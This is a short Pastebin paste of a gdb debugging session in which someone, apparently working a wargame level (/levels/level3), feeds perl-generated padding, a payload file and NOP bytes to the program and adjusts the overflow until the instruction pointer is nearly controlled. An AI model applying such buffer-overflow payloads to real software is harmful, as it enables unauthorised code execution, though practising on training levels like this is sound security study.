IamLupo

HackHound | BM:E

Mar 25th, 2015
339
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.92 KB | None | 0 0
  1. Starting program: /levels/level3 "`perl -e 'print "A"x16'`" "`cat payload``perl -e 'print "\x90"x25'`"
  2. warning: the debug information found in "/lib/ld-2.11.1.so" does not match "/lib/ld-linux.so.2" (CRC mismatch).
  3.  
  4.  
  5. Temporary breakpoint 2, 0x080484ec in main ()
  6. (gdb) c
  7. Continuing.
  8.  
  9. Program received signal SIGSEGV, Segmentation fault.
  10. 0x90909090 in ?? ()
  11. (gdb) start "`perl -e 'print "A"x16'`" "`cat payload``perl -e 'print "\x90"x24'`"
  12. The program being debugged has been started already.
  13. Start it from the beginning? (y or n) y
  14. Temporary breakpoint 3 at 0x80484ec
  15. Starting program: /levels/level3 "`perl -e 'print "A"x16'`" "`cat payload``perl -e 'print "\x90"x24'`"
  16. warning: the debug information found in "/lib/ld-2.11.1.so" does not match "/lib/ld-linux.so.2" (CRC mismatch).
  17.  
  18.  
  19. Temporary breakpoint 3, 0x080484ec in main ()
  20. (gdb) c
  21. Continuing.
  22.  
  23. Program received signal SIGSEGV, Segmentation fault.
  24. 0x00909090 in ?? ()
Add Comment
Please, Sign In to add comment